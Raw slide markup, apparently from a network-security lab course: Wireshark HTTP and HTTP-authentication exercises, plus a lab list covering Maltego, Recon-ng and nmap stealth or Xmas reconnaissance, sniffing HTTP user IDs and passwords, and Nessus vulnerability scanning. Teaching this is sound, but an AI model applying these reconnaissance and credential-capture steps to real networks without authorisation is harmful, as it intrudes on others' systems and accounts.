                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>What languages (if any) does your browser indicate that it can accept to the server?</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>What is the IP address of your computer? Of the gaia.cs.umass.edu server?</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-273050" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>How many bytes of content are being returned to your browser?</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="551" name="Google Shape;551;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3335999" y="1429219"/>
            <a:ext cx="5515049" cy="272176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84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200956" y="573281"/>
            <a:ext cx="74286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Wireshark with HTTP Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-262255" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Finally, let’s try visiting a web site that is password-protected and examine the sequence of HTTP message exchanged for such a site. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-262255" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The URL http://gaia.cs.umass.edu/wireshark-labs/protected_pages/HTTP-wireshark-file5.html is password protected. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-262255" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The username is “wireshark-students” (without the quotes), and the password is “network” (again, without the quotes).</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buSzPct val="77777"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">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85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200956" y="573281"/>
            <a:ext cx="74286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Wireshark with HTTP Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565;p85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-262255" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Start up the Wireshark packet sniffer</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-262255" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Enter the following URL into your browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>http://gaia.cs.umass.edu/wireshark-labs/protected_pages/HTTP-wireshark- file5.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Type the requested username and password into the pop up box.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-262255" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Stop Wireshark packet capture, and enter “http” in the display-filter-specification window, so that only captured HTTP messages will be displayed later in the packet-listing window.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buSzPct val="77777"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">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86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079644" y="270000"/>
            <a:ext cx="74286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Wireshark with HTTP Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="572" name="Google Shape;572;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091638" y="1135688"/>
            <a:ext cx="5586137" cy="380158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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="209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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>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5. Capture HTTP Packet and identify User Id and Password using Wireshark </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b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>6. Perform vulnerability scanning using Nessus tool</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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8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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="1192800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Download NESSUS FROM</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>https://www.tenable.com/downloads/nessus?loginAttempted=true</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="584" name="Google Shape;584;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="917850" y="1823175"/>
            <a:ext cx="7203000" cy="31793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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="591" name="Google Shape;591;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570575" y="1183425"/>
            <a:ext cx="6705601" cy="37621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9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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="598" name="Google Shape;598;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030825" y="1017725"/>
            <a:ext cx="6493925" cy="405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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="Google Shape;228;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1672175"/>
            <a:ext cx="9144000" cy="33221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91"/>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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Google Shape;604;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="605" name="Google Shape;605;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
